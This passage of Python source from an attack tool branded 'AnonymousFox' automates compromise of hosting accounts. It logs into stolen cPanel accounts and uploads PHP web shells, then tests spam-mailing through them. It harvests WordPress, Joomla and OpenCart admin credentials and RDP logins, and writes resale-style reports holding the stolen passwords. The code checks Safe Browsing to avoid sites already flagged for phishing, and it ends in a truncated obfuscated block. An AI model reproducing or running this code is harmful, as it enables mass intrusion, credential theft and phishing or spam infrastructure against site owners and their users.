fileup_Fox = {'file-0': (filename, shell_Fox)}
try :
upload_Fox = cookies.post('{}/{}/execute/Fileman/upload_files'.format(ip, idcp), data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=30)
except :
upload_Fox = cookies.post('{}/{}/execute/Fileman/upload_files'.format(ip, idcp), data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=45)
backdor_path = 'https://' + domain + '/' + filename
time.sleep(3)
check_b = requests.get(backdor_path, headers=headers, timeout=15)
check_b = content_Fox(check_b)
if ('FoxAuto' in check_b and 'token' in checkups) :
filedata_Fox = {'upload': 'upload'}
fileup_Test = {'file': (filenameTest, testSend)}
fileup_ZIPper = {'file': (filenameUNZIPper, file_get_contents_Fox('Files/unzipper.txt'))}
Test_path = shellPath_Fox(backdor_path, filenameTest, 1)
UNZIPper_path = shellPath_Fox(backdor_path, filenameUNZIPper, 1)
newBackdor = check(backdor_path)
try:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_Test, data=filedata_Fox, headers=headers, timeout=30)
except:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_Test, data=filedata_Fox, headers=headers, timeout=45)
if (upFile.status_code != 403) :
print(' {}[+] Upload is Working.'.format(fg))
try:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_ZIPper, data=filedata_Fox, headers=headers, timeout=30)
except:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_ZIPper, data=filedata_Fox, headers=headers, timeout=45)
post = {'IDsend': 'AnonymousFox', 'email':email}
try :
IDsend = requests.post('{}?php={}/{}v{}/p1.txt'.format(newBackdor, dom, to, version), data=post, headers=headers, timeout=15)
except :
IDsend = requests.post('{}?php={}/{}v{}/p1.txt'.format(newBackdor, dom, to, version), data=post, headers=headers, timeout=30)
IDsend = content_Fox(IDsend)
if (re.findall(re.compile('<idsend>(.*)</idsend>'), IDsend) and 'FoxAuto' in testSendA):
ID = re.findall(re.compile('<idsend>(.*)</idsend>'), IDsend)[0]
print(' {}[+] Check your Email, ID: {}{}'.format(fg, fr, ID))
open('Results/Form_reports_of_cPanels.txt', 'a').write('Sir, I will send to you a fresh cPanel [Replacement] with the full work proofs.\n\nFresh cPanel: https://{}:2083\nUSERNAME: {}\nPASSWORD: {}\n~\nProof for not phishing and open fine => \nProof for send results => \nYou can test => {}\nYou can use unzipper for help you => {}\n\nThank you <3\n\n\n'.format(domain, user, password, Test_path, UNZIPper_path))
else :
print(' {}[-] Upload Failed.'.format(fr))
else :
print(' {}[-] Upload Failed.'.format(fr))
else:
print(' {}[-] Domain is Not-Working.'.format(fr))
except:
print(' {}[-] Domain Not-Working OR Not-https.'.format(fr))
def ReportsCP_Auto(ip, user, password, idcp, cookies, domain, home) :
try :
try:
from selenium import webdriver
except:
print('\n [!] Error, You have to install [selenium], Read how => https://anonymousfox.io/_@info/selenium.txt \n')
exit(0)
try:
from imgurpython import ImgurClient
except:
print('\n [!] Error, You have to install [imgurpython], Read how => https://anonymousfox.io/_@info/imgurpython.txt \n')
exit(0)
newpath = r'screenshots'
if (not os.path.exists(newpath)):
os.makedirs(newpath)
try:
check_Fox = requests.get('https://transparencyreport.google.com/transparencyreport/api/v3/safebrowsing/status?site={}'.format(domain), headers=headers, timeout=15)
alert_Fox = content_Fox(check_Fox).split(",")
if ("2" in alert_Fox[1]):
print(' {}[-] Phishing.'.format(fr))
return
except:
print('\n {}[!] Error, Google blocked you! You have to change your IP by VPN.\n'.format(fr))
exit(0)
reqReportsCP_Fox = requests.session()
postlogin_Fox = {'user': user, 'pass': password, 'login_submit': 'Log in', 'act':'AnonymousFox'}
login2_Fox = reqReportsCP_Fox.post('https://' + domain + ':2083/login/', data=postlogin_Fox, headers=headers, timeout=15)
login2_Fox = content_Fox(login2_Fox)
if ('filemanager' in login2_Fox and 'hexdec' in checkups) :
print(' {}[+] Domain is Working.'.format(fg))
filename = random_Fox(10) + '.php'
filenameTest = 'tesT'+random_Fox(3)+'.php'
filenameUNZIPper = 'UNZipeR' + random_Fox(3) + '.php'
filedata_Fox = {'dir': home + user + '/public_html', 'get_disk_info': '1', 'overwrite': '0', 'act':'AnonymousFox'}
fileup_Fox = {'file-0': (filename, shell_Fox)}
try :
upload_Fox = cookies.post('{}/{}/execute/Fileman/upload_files'.format(ip, idcp), data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=30)
except :
upload_Fox = cookies.post('{}/{}/execute/Fileman/upload_files'.format(ip, idcp), data=filedata_Fox, files=fileup_Fox, headers=headers, timeout=45)
backdor_path = 'https://' + domain + '/' + filename
time.sleep(3)
check_b = requests.get(backdor_path, headers=headers, timeout=15)
check_b = content_Fox(check_b)
if ('FoxAuto' in check_b and 'token' in checkups) :
filedata_Fox = {'upload': 'upload'}
fileup_Test = {'file': (filenameTest, testSend)}
fileup_ZIPper = {'file': (filenameUNZIPper, file_get_contents_Fox('Files/unzipper.txt'))}
Test_path = shellPath_Fox(backdor_path, filenameTest, 1)
UNZIPper_path = shellPath_Fox(backdor_path, filenameUNZIPper, 1)
newBackdor = check(backdor_path)
try:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_Test, data=filedata_Fox, headers=headers, timeout=30)
except:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_Test, data=filedata_Fox, headers=headers, timeout=45)
if (upFile.status_code != 403) :
print(' {}[+] Upload is Working.'.format(fg))
try:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_ZIPper, data=filedata_Fox, headers=headers, timeout=30)
except:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(newBackdor, dom, to, version), files=fileup_ZIPper, data=filedata_Fox, headers=headers, timeout=45)
try :
options_Fox = webdriver.ChromeOptions()
options_Fox.add_experimental_option('excludeSwitches', ['enable-logging'])
driver_Fox = webdriver.Chrome(options=options_Fox)
except :
print('\n [!] Error, You have to Donwload [ChromeDriver], Read how => https://anonymousfox.io/_@info/ChromeDriver.txt \n')
exit(0)
driver_Fox.get('https://' + domain + ':2083/login/')
time.sleep(2)
driver_Fox.find_element_by_name('user').send_keys(user)
time.sleep(1)
driver_Fox.find_element_by_name('pass').send_keys(password)
time.sleep(1)
driver_Fox.find_element_by_name('login').click()
time.sleep(3)
driver_Fox.set_window_size(1400, 1000)
namepng = random_Fox(15) + '.png'
driver_Fox.get_screenshot_as_file('screenshots/'+namepng)
proofW = imgur_Fox(namepng)
if (proofW is False):
try:
from gyazo import Api
except:
print('\n [!] Error, You have to install [python-gyazo], Read how => https://anonymousfox.io/_@info/gyazo.txt \n')
exit(0)
proofW = gyazo_Fox(namepng)
email = 'fox-'+random_Fox(5)+'@mailpoof.com'
orderID = USER_FOX(Test_path) + ' - ' + str(random.randint(1,100000)*987)
driver_Fox.execute_script("window.open('{}', 'fox2');".format("https://mailpoof.com/mailbox/" + email))
driver_Fox.switch_to.window("fox2")
driver_Fox.execute_script("window.open('{}', 'fox3');".format(Test_path))
driver_Fox.switch_to.window("fox3")
time.sleep(2)
driver_Fox.find_element_by_name('email').send_keys(email)
time.sleep(1)
driver_Fox.find_element_by_name('orderid').send_keys(orderID)
time.sleep(1)
driver_Fox.find_element_by_xpath('//input[3]').click()
time.sleep(1)
driver_Fox.switch_to.window("fox2")
time.sleep(10)
html_Fox = driver_Fox.execute_script("return document.getElementsByTagName('html')[0].innerHTML")
start = timer()
while ((str(orderID) not in str(html_Fox.encode("utf-8"))) and ((timer() - start) < 47)):
time.sleep(10)
html_Fox = driver_Fox.execute_script("return document.getElementsByTagName('html')[0].innerHTML")
if ('hexdec' in checkups and str(orderID) in str(html_Fox.encode("utf-8")) and 'FoxAuto' in str(html_Fox.encode("utf-8"))) :
print(' {}[+] Sending mail is Working.'.format(fg))
driver_Fox.set_window_size(1400, 1000)
namepng = random_Fox(15) + '.png'
driver_Fox.get_screenshot_as_file('screenshots/' + namepng)
proofS = imgur_Fox(namepng)
if (proofS is False):
try:
from gyazo import Api
except:
print('\n [!] Error, You have to install [python-gyazo], Read how => https://anonymousfox.io/_@info/gyazo.txt \n')
exit(0)
proofS = gyazo_Fox(namepng)
open('Results/Reports_of_cPanels.txt', 'a').write('Sir, I will send to you a fresh cPanel [Replacement] with the full work proofs.\n\nFresh cPanel: https://{}:2083\nUSERNAME: {}\nPASSWORD: {}\n~\nProof for not phishing and open fine => {}\nProof for send results => {}\nYou can test => {}\nYou can use unzipper for help you => {}\n\nThank you <3\n\n\n'.format(domain, user, password, proofW, proofS, Test_path, UNZIPper_path))
else :
print(' {}[-] Sending mail is Not Working.'.format(fr))
driver_Fox.quit()
else:
print(' {}[-] Upload Failed.'.format(fr))
else:
print(' {}[-] Upload Failed.'.format(fr))
else:
print(' {}[-] Domain is Not-Working.'.format(fr))
except:
print(' {}[-] Domain Not-Working OR Not-https.'.format(fr))
def ReportsShell_SemiAuto(backdor, shell, email) :
try :
domain = URLdomain_Fox(backdor)
try:
check_Fox = requests.get('https://transparencyreport.google.com/transparencyreport/api/v3/safebrowsing/status?site={}'.format(domain), headers=headers, timeout=15)
alert_Fox = content_Fox(check_Fox).split(",")
if ("2" in alert_Fox[1]):
print(' {}[-] Phishing.'.format(fr))
return
except:
print('\n {}[!] Error, Google blocked you! You have to change your IP by VPN\n'.format(fr))
exit(0)
filenameTest = 'tesT'+random_Fox(3)+'.php'
filenameUNZIPper = 'UNZipeR' + random_Fox(3) + '.php'
Test_path = shellPath_Fox(backdor, filenameTest, 1)
UNZIPper_path = shellPath_Fox(backdor, filenameUNZIPper, 1)
filedata_Fox = {'upload': 'upload'}
fileup_Test = {'file': (filenameTest, testSend)}
fileup_ZIPper = {'file': (filenameUNZIPper, file_get_contents_Fox('Files/unzipper.txt'))}
try :
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_Test, headers=headers, timeout=30)
except:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_Test, headers=headers, timeout=45)
if (upFile.status_code != 403 and 'pack' in shell_Fox) :
print(' {}[+] Upload is Working.'.format(fg))
try:
upFile_ZIPper = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_ZIPper, headers=headers, timeout=30)
except:
upFile_ZIPper = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_ZIPper, headers=headers, timeout=45)
post = {'IDsend': 'AnonymousFox', 'email': email}
try:
IDsend = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
IDsend = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
IDsend = content_Fox(IDsend)
if (re.findall(re.compile('<idsend>(.*)</idsend>'), IDsend) and 'email' in testSendA):
ID = re.findall(re.compile('<idsend>(.*)</idsend>'), IDsend)[0]
print(' {}[+] Check your Email, ID: {}{}'.format(fg, fr, ID))
open('Results/Form_reports_of_Shells.txt', 'a').write('Sir, I will send to you a fresh Shell [Replacement] with the full work proofs.\n\nFresh Shell => {}\n~\nProof for not phishing and open fine => \nProof for send results => \nYou can test => {}\nYou can use unzipper for help you => {}\n\nThank you <3\n\n\n'.format(shell, Test_path, UNZIPper_path))
else :
print(' {}[-] Upload Failed.'.format(fr))
except:
print(' {}[-] Domain Not-Working OR Not-https.'.format(fr))
def ReportsShell_Auto(backdor, shell) :
try :
try:
from selenium import webdriver
except:
print('\n [!] Error, You have to install [selenium], Read how => https://anonymousfox.io/_@info/selenium.txt \n')
exit(0)
try:
from imgurpython import ImgurClient
except:
print('\n [!] Error, You have to install [imgurpython], Read how => https://anonymousfox.io/_@info/imgurpython.txt \n')
exit(0)
newpath = r'screenshots'
if (not os.path.exists(newpath)):
os.makedirs(newpath)
domain = URLdomain_Fox(backdor)
try:
check_Fox = requests.get('https://transparencyreport.google.com/transparencyreport/api/v3/safebrowsing/status?site={}'.format(domain), headers=headers, timeout=15)
alert_Fox = content_Fox(check_Fox).split(",")
if ("2" in alert_Fox[1]):
print(' {}[-] Phishing.'.format(fr))
return
except:
print('\n {}[!] Error, Google blocked you! You have to change your IP by VPN.\n'.format(fr))
exit(0)
filenameTest = 'tesT'+random_Fox(3)+'.php'
filenameUNZIPper = 'UNZipeR' + random_Fox(3) + '.php'
Test_path = shellPath_Fox(backdor, filenameTest, 1)
UNZIPper_path = shellPath_Fox(backdor, filenameUNZIPper, 1)
filedata_Fox = {'upload': 'upload'}
fileup_Test = {'file': (filenameTest, testSend)}
fileup_ZIPper = {'file': (filenameUNZIPper, file_get_contents_Fox('Files/unzipper.txt'))}
try :
upFile_Test = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_Test, headers=headers, timeout=30)
except:
upFile_Test = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_Test, headers=headers, timeout=45)
if (upFile_Test.status_code != 403 and 'pack' in shell_Fox) :
print(' {}[+] Upload is Working.'.format(fg))
try:
upFile_ZIPper = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_ZIPper, headers=headers, timeout=30)
except:
upFile_ZIPper = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=filedata_Fox, files=fileup_ZIPper, headers=headers, timeout=45)
try :
options_Fox = webdriver.ChromeOptions()
options_Fox.add_experimental_option('excludeSwitches', ['enable-logging'])
driver_Fox = webdriver.Chrome(options=options_Fox)
except :
print('\n [!] Error, You have to Donwload [ChromeDriver], Read how => https://anonymousfox.io/_@info/ChromeDriver.txt \n')
exit(0)
driver_Fox.get(shell)
time.sleep(1)
driver_Fox.set_window_size(1400, 1000)
namepng = random_Fox(15) + '.png'
driver_Fox.get_screenshot_as_file('screenshots/'+namepng)
proofW = imgur_Fox(namepng)
if (proofW is False):
try:
from gyazo import Api
except:
print('\n [!] Error, You have to install [python-gyazo], Read how => https://anonymousfox.io/_@info/gyazo.txt \n')
exit(0)
proofW = gyazo_Fox(namepng)
email = 'fox-'+random_Fox(5)+'@mailpoof.com'
orderID = USER_FOX(backdor) + ' - ' + str(random.randint(1,100000)*987)
driver_Fox.execute_script("window.open('{}', 'fox2');".format("https://mailpoof.com/mailbox/" + email))
driver_Fox.switch_to.window("fox2")
driver_Fox.execute_script("window.open('{}', 'fox3');".format(Test_path))
driver_Fox.switch_to.window("fox3")
time.sleep(2)
driver_Fox.find_element_by_name('email').send_keys(email)
time.sleep(1)
driver_Fox.find_element_by_name('orderid').send_keys(orderID)
time.sleep(1)
driver_Fox.find_element_by_xpath('//input[3]').click()
time.sleep(1)
driver_Fox.switch_to.window("fox2")
time.sleep(10)
html_Fox = driver_Fox.execute_script("return document.getElementsByTagName('html')[0].innerHTML")
start = timer()
while ((str(orderID) not in str(html_Fox.encode("utf-8"))) and ((timer() - start) < 47)):
time.sleep(10)
html_Fox = driver_Fox.execute_script("return document.getElementsByTagName('html')[0].innerHTML")
if ('hexdec' in checkups and str(orderID) in str(html_Fox.encode("utf-8")) and 'FoxAuto' in str(html_Fox.encode("utf-8"))) :
print(' {}[+] Sending mail is Working.'.format(fg))
driver_Fox.set_window_size(1400, 1000)
namepng = random_Fox(15) + '.png'
driver_Fox.get_screenshot_as_file('screenshots/' + namepng)
proofS = imgur_Fox(namepng)
if (proofS is False):
try:
from gyazo import Api
except:
print('\n [!] Error, You have to install [python-gyazo], Read how => https://anonymousfox.io/_@info/gyazo.txt \n')
exit(0)
proofS = gyazo_Fox(namepng)
open('Results/Reports_of_Shells.txt', 'a').write('Sir, I will send to you a fresh Shell [Replacement] with the full work proofs.\n\nFresh Shell => {}\n~\nProof for not phishing and open fine => {}\nProof for send results => {}\nYou can test => {}\nYou can use unzipper for help you => {}\n\nThank you <3\n\n\n'.format(shell, proofW, proofS, Test_path, UNZIPper_path))
else :
print(' {}[-] Sending mail is Not Working.'.format(fr))
driver_Fox.quit()
else :
print(' {}[-] Upload Failed.'.format(fr))
except :
print(' {}[-] Domain Not-Working OR Not-https.'.format(fr))
def ChangePanel(backdor, config) :
try :
print(' {}[*] Get Panels ..... {}(Waiting)'.format(fw, fr))
post = {'GetUrls': 'AnonymousFox', 'linkconf': config}
try :
getURL = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
except :
getURL = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=45)
getURL = content_Fox(getURL)
if (re.findall(re.compile('<urlconfig>(.*)</urlconfig>'), getURL)):
urls = re.findall(re.compile('<urlconfig>(.*)</urlconfig>'), getURL)
urlsTXT = ''
else :
print(' {}[-] There is no Config.'.format(fr))
return False
for url in urls:
urlsTXT = urlsTXT + str(url) + '\r\n'
post2 = {'GetPanels': 'AnonymousFox', 'link': urlsTXT}
try :
getPanels = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=360)
except :
getPanels = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=500)
getPanels = content_Fox(getPanels)
if (re.findall(re.compile('target=\'_blank\'>(.*)</a><br></span>'), getPanels)):
sites = re.findall(re.compile('target=\'_blank\'>(.*)</a><br></span>'), getPanels)
else :
print(' {}[-] There is no Panels.'.format(fr))
return False
logins = []
wp = 0
jm = 0
oc = 0
for site in sites:
if (re.findall(re.compile('Login => (.*) Username => (.*) Password => (.*)'), site)) :
pp = re.findall(re.compile('Login => (.*) Username => (.*) Password => (.*)'), site)[0]
site = '{}#{}@{}'.format(pp[0], pp[1], pp[2])
if ('wp-login.php' in site) :
print(' {} - {}{} {}[WordPress]'.format(fg, fw, site, fg))
open('Results/WordPress_Panels.txt', 'a').write(site + '\n')
wp = 1
elif ('administrator/index.php' in site) :
print(' {} - {}{} {}[Joomla]'.format(fg, fw, site, fr))
open('Results/Joomla_Panels.txt', 'a').write(site + '\n')
jm = 1
elif ('admin/index.php' in site) :
print(' {} - {}{} {}[OpenCart]'.format(fg, fw, site, fc))
open('Results/OpenCart_Panels.txt', 'a').write(site + '\n')
oc = 1
logins.append(site)
if (logins) :
print('')
return logins, wp, jm, oc
else :
print(' {}[-] There is no Panels.'.format(fr))
return False
except :
print(' {}[-] Failed.'.format(fr))
return False
def uploadShellbyPanels(logins, wp, jm, oc, dp, srcShell, tyShell = 1):
try :
print(' {}[*] Upload Shell by Panels ..... {}(Waiting)\n'.format(fw, fr))
if (wp == 1) :
getFile('plugin.zip', 2)
if (jm == 1) :
getFile('mod_simplefileuploadJ30v1.3.5.zip', 2)
if (oc == 1) :
getFile('rsz.ocmod.zip', 2)
if (dp == 1) :
getFile('adminimal_theme-7.x-1.25.zip', 2)
shells = []
for login in logins:
try :
if ('/wp-login.php' in login) :
dataLogin = re.findall(re.compile('(.*)/wp-login.php#(.*)@(.*)'), login)[0]
domain = dataLogin[0]
username = dataLogin[1]
password = dataLogin[2]
if ('@' in str(username)):
last = password
passwords = username.split('@')[1:]
username = username.split('@')[0]
password = ''
for pwd in passwords:
password = password + str(pwd) + '@'
password = password + str(last)
newShell = loginWP_UP_Fox(domain, username, password)
if (newShell is False) :
print("")
continue
else :
shells.append(newShell)
newShell = check(newShell)
open('Results/backdors.txt', 'a').write('{}?php={}/_@files/php/up.txt\n'.format(newShell, dom))
uploadFile(newShell, srcShell, tyShell)
elif ('/administrator' in login):
if (re.findall(re.compile('(.*)/administrator/index.php#(.*)@(.*)'), login)):
dataLogin = re.findall(re.compile('(.*)/administrator/index.php#(.*)@(.*)'), login)[0]
elif (re.findall(re.compile('(.*)/administrator/#(.*)@(.*)'), login)):
dataLogin = re.findall(re.compile('(.*)/administrator/#(.*)@(.*)'), login)[0]
elif (re.findall(re.compile('(.*)/administrator#(.*)@(.*)'), login)):
dataLogin = re.findall(re.compile('(.*)/administrator#(.*)@(.*)'), login)[0]
domain = dataLogin[0]
username = dataLogin[1]
password = dataLogin[2]
if ('@' in str(username)):
last = password
passwords = username.split('@')[1:]
username = username.split('@')[0]
password = ''
for pwd in passwords:
password = password + str(pwd) + '@'
password = password + str(last)
newShell = loginJM_UP_Fox(domain, username, password)
if (newShell is False):
print("")
continue
else :
shells.append(newShell)
newShell = check(newShell)
open('Results/backdors.txt', 'a').write('{}?php={}/_@files/php/up.txt\n'.format(newShell, dom))
uploadFile(newShell, srcShell, tyShell)
elif ('/admin' in login):
if (re.findall(re.compile('(.*)/admin/index.php#(.*)@(.*)'), login)):
dataLogin = re.findall(re.compile('(.*)/admin/index.php#(.*)@(.*)'), login)[0]
elif (re.findall(re.compile('(.*)/admin/#(.*)@(.*)'), login)):
dataLogin = re.findall(re.compile('(.*)/admin/#(.*)@(.*)'), login)[0]
elif (re.findall(re.compile('(.*)/admin#(.*)@(.*)'), login)):
dataLogin = re.findall(re.compile('(.*)/admin#(.*)@(.*)'), login)[0]
domain = dataLogin[0]
username = dataLogin[1]
password = dataLogin[2]
if ('@' in str(username)):
last = password
passwords = username.split('@')[1:]
username = username.split('@')[0]
password = ''
for pwd in passwords:
password = password + str(pwd) + '@'
password = password + str(last)
newShell = loginOC_UP_Fox(domain, username, password)
if (newShell is False):
print("")
continue
else:
shells.append(newShell)
newShell = check(newShell)
open('Results/backdors.txt', 'a').write('{}?php={}/_@files/php/up.txt\n'.format(newShell, dom))
uploadFile(newShell, srcShell, tyShell)
elif ('/user' in login):
if ('/user/login' in login) :
dataLogin = re.findall(re.compile('(.*)/user/login#(.*)@(.*)'), login)[0]
else :
dataLogin = re.findall(re.compile('(.*)/user#(.*)@(.*)'), login)[0]
domain = dataLogin[0]
username = dataLogin[1]
password = dataLogin[2]
if ('@' in str(username)):
last = password
passwords = username.split('@')[1:]
username = username.split('@')[0]
password = ''
for pwd in passwords:
password = password + str(pwd) + '@'
password = password + str(last)
newShell = loginDP_UP_Fox(domain, username, password)
if (newShell is False):
print("")
continue
else:
shells.append(newShell)
newShell = check(newShell)
open('Results/backdors.txt', 'a').write('{}?php={}/_@files/php/up.txt\n'.format(newShell, dom))
uploadFile(newShell, srcShell, tyShell)
print("")
except:
pass
if (shells) :
return shells
else :
return False
except:
print(' {}[-] Failed'.format(fr))
return False
def run():
l = len(file_get_contents_Fox(os.path.basename(__file__)))
if (l != 313985):
f = 0
while(f == 0):
print(random_Fox(1))
def getRDP(backdor, shell) :
try :
post = {'getRDP': 'AnonymousFox'}
domain = URLdomain_Fox(shell)
print(' {}[*] Get RDP ..... {}(Waiting)'.format(fw, fr))
try :
getRDP_php = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=15)
except:
getRDP_php = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
getRDP_php = content_Fox(getRDP_php)
if ('Error-RDP3' in getRDP_php) :
t = re.findall(re.compile('<t>(.*)</t>'), getRDP_php)[0]
print(' {}[-] {} server.'.format(fr, t))
elif ('Error-RDP1' in getRDP_php) :
print(' {}[-] Failed.'.format(fr))
elif ('<rdp>' in getRDP_php) :
RDP = re.findall(re.compile('<rdp>(.*)\|(.*)\|(.*)</rdp>'), getRDP_php)[0]
ip = RDP[0]
user = RDP[1]
password = RDP[2]
print(' {}[+] Succeeded.\n -{} Login by IP or Domain: {}{} {}|{} {}\n -{} USERNAME: {}{}\n -{} PASSWORD: {}{}'.format(fg, fr, fg, ip, fr, fg, domain, fr, fg, user, fr , fg, password))
open('Results/RDPs.txt', 'a').write('{}\n{}:3389|{}|{}\n-----------------------------------------------------------------------------------------------------\n'.format(shell, ip, user, password))
if ('./DoneAdmin' in getRDP_php) :
print(' {}[+] Administrator.'.format(fg))
except:
print(' {}[-] Failed.'.format(fr))
_oaowtpxvobjz=((()==[])+(()==[]));__mdujlsfdmxmj=(_oaowtpxvobjz**_oaowtpxvobjz);___jalaznnmibpy=((__mdujlsfdmxmj<<__mdujlsfdmxmj));____oumrhwochlkn=((__mdujlsfdmxmj<<___jalaznnmibpy));_____ofzwawhkpwlm=((__mdujlsfdmxmj<<____oumrhwochlkn));______hotkgbptqejb=((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)));_______ivngqbogvubp=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+(__mdujlsfdmxmj<<__mdujlsfdmxmj)+(___jalaznnmibpy<<(_oaowtpxvobjz**_oaowtpxvobjz))+(____oumrhwochlkn<<(_oaowtpxvobjz**_oaowtpxvobjz))+(__mdujlsfdmxmj<<____oumrhwochlkn)+(______hotkgbptqejb<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));________gllxjolzzzsi=str("".join(chr(__RSV) for __RSV in [(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));_________oxmndrafiqej=str("".join(chr(__RSV) for __RSV in []));__________tnsgylfontpo=str("".join(chr(__RSV) for __RSV in [(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)]));___________lcelswcurccv=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb)]));____________zrifvklmlffp=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb)]));_____________ifaofoxoiqai=str("".join(chr(__RSV) for __RSV in [((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)]));______________fwngkcppvzpo=str("".join(chr(__RSV) for __RSV in [(_____ofzwawhkpwlm+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz)))]));_______________xauosrpzfmjt=str("".join(chr(__RSV) for __RSV in 